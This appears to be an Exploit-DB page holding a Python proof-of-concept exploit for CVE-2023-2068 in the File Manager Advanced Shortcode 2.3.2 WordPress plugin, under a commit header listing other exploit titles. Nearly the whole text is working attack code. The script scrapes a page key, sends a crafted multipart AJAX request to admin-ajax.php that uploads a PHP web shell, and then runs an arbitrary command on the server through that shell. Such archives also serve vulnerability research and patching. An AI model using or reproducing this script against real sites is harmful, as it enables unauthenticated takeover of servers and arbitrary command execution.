25f2c0adca
8 changes to exploits/shellcodes/ghdb STARFACE 7.3.0.10 - Authentication with Password Hash Possible Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated) Best POS Management System v1.0 - Unauthenticated Remote Code Execution Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) Faculty Evaluation System 1.0 - Unauthenticated File Upload File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE) MotoCMS Version 3.4.3 - SQL Injection Online Security Guards Hiring System 1.0 - Reflected XSS Total CMS 1.7.4 - Remote Code Execution (RCE) Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
82 lines
No EOL
4.4 KiB
Python
Executable file
82 lines
No EOL
4.4 KiB
Python
Executable file
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
|
|
# Date: 05/31/2023
|
|
# Exploit Author: Mateus Machado Tesser
|
|
# Vendor Homepage: https://advancedfilemanager.com/
|
|
# Version: File Manager Advanced Shortcode 2.3.2
|
|
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
|
|
# CVE: CVE-2023-2068
|
|
|
|
import requests
|
|
import json
|
|
import pprint
|
|
import sys
|
|
import re
|
|
|
|
PROCESS = "\033[1;34;40m[*]\033[0m"
|
|
SUCCESS = "\033[1;32;40m[+]\033[0m"
|
|
FAIL = "\033[1;31;40m[-]\033[0m"
|
|
|
|
try:
|
|
COMMAND = sys.argv[2]
|
|
IP = sys.argv[1]
|
|
if len(COMMAND) > 1:
|
|
pass
|
|
if IP:
|
|
pass
|
|
else:
|
|
print(f'Use: {sys.argv[0]} IP COMMAND')
|
|
except:
|
|
pass
|
|
|
|
url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
|
|
print(f"{PROCESS} Searching fmakey")
|
|
|
|
try:
|
|
r = requests.get(url)
|
|
raw_fmakey = r.text
|
|
fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
|
|
if len(fmakey) == 0:
|
|
print(f"{FAIL} Cannot found fmakey!")
|
|
except:
|
|
print(f"{FAIL} Cannot found fmakey!")
|
|
|
|
print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
|
|
url = "http://"+IP+"/wp-admin/admin-ajax.php"
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
|
|
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
|
|
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
|
|
r = requests.post(url, headers=headers, data=data)
|
|
print(f"{PROCESS} Sending AJAX request to: {url}")
|
|
if 'errUploadMime' in r.text:
|
|
print(f'{FAIL} Exploit failed!')
|
|
sys.exit()
|
|
elif r.headers['Content-Type'].startswith("text/html"):
|
|
print(f'{FAIL} Exploit failed! Try to change _fmakey')
|
|
sys.exit(0)
|
|
else:
|
|
print(f'{SUCCESS} Exploit executed with success!')
|
|
exploited = json.loads(r.text)
|
|
url = ""
|
|
print(f'{PROCESS} Getting URL with webshell')
|
|
for i in exploited["added"]:
|
|
url = i['url']
|
|
print(f"{PROCESS} Executing '{COMMAND}'")
|
|
r = requests.get(url+'?cmd='+COMMAND)
|
|
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text) |